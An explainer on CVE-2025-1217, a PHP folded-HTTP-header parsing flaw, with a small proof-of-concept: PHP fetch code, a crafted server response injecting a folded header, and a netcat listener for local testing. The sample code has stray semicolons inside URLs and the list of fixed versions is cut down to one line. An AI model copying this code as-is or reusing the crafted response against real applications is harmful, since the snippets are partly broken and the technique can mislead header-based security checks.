CVE-2025-1217 - PHP HTTP Folded Headers Parsing Vulnerability Explained (With Exploit Example)

PHP is one of the most widely used server-side languages on the internet. When a severe security bug is found in PHP core, tons of web applications, from small blogs to big e-commerce platforms, are suddenly at risk. That’s why CVE-2025-1217 is such a notable vulnerability, and it’s important for everyone running PHP to understand what it means, how it can be exploited, and how to fix it.

What is CVE-2025-1217?

CVE-2025-1217 is a vulnerability found in PHP’s HTTP module, specifically in its handling of “folded headers” within HTTP responses. Simply put, the bug allows HTTP response headers from a server to be interpreted incorrectly by PHP applications. This misinterpretation can result in using the wrong headers—such as Content-Type—leading to security risks like content sniffing, cache poisoning, or bypassing certain application protections.

What are Folded Headers?

In HTTP/1.x, headers can be "folded" — that means the value of a header can span multiple lines, with each new line beginning with a space or tab. For example:

Some-Header: value1
  value2
Another-Header: value3

This is a legacy feature in HTTP, and most modern clients and servers don’t need it; in fact, it’s deprecated. But some systems and proxies still use or accept folded headers, so the parser must handle them carefully.

The Problem

Prior to the fixed PHP releases, when PHP applications performing HTTP requests (like with file_get_contents(), curl, or fopen()) received a response with folded headers, PHP’s module parsed these headers incorrectly.

This could allow a malicious server to craft a response where some headers are “folded” so that their content gets mixed up with other headers. PHP might assign the wrong header value, or pass along altered headers to the application.

Imagine if your application checks for Content-Type: application/json to process a response securely. If an attacker can mess with this header, they might sneak in a malicious payload or trick your app into handling data the wrong way.

Exploit Details and Example

Let’s look at an example. Say your PHP application uses file_get_contents to fetch data from an external server, and it trusts certain headers:

<?php
$headers = get_headers('http://malicious-server.local/api/data';, 1);
$contentType = $headers['Content-Type'];
if ($contentType === 'application/json') {
    $data = file_get_contents('http://malicious-server.local/api/data';);
    // process $data as JSON
}
?>

A malicious server could send back

HTTP/1.1 200 OK
Content-Type: application/json
 Set-Cookie: hackme=1
Content-Length: 123

Notice the space: The folded header will be seen by PHP as part of the previous header’s value. PHP will parse Content-Type as:

application/json Set-Cookie: hackme=1

So, the $headers['Content-Type'] would not match exactly application/json as expected. Or, in a different logic, the attacker could use this technique to hide harmful headers that PHP will not process as expected, which could result in unexpected and unsafe behaviors.

Try this with a local server

<?php
// Make sure to run this script to test folded header parsing
$headers = get_headers('http://localhost:808/';, 1);
print_r($headers);
?>

Then, spin up a simple server (for example, using netcat)

nc -l 808

Paste this as the HTTP response

HTTP/1.1 200 OK
Content-Type: application/json
 X-Evil: yes
Content-Length: 5

hello

After running the PHP script, you’ll see how PHP merges "X-Evil: yes" into the "Content-Type" key.

Real-World Impact

- Header forgery or bypass: An attacker might trick your app into trusting a forged Content-Type.
- Cache poisoning: Caches that key off headers can be poisoned if they interpret headers differently than PHP does.

8.4 users: 8.4.5+

Workaround: Always validate the exact content of the headers you receive, and avoid trusting third-party servers for security-critical logic.

References

- PHP Changelog 8.1.32
- Security Advisory
- RFC: Deprecating Folded Header Parsing
- CVE-2025-1217 on NVD *(Pending full details)*

Summary

CVE-2025-1217 is serious because it lets attackers play games with how your PHP app understands HTTP headers. Always keep PHP up to date, never trust headers blindly, and keep your software (and the components it depends on) patched. With simple checks and care, you can avoid big headaches down the line.

For more details and full technical info, see the official PHP changelog.

Timeline

Published on: 03/29/2025 06:15:36 UTC
Last modified on: 05/01/2025 19:29:33 UTC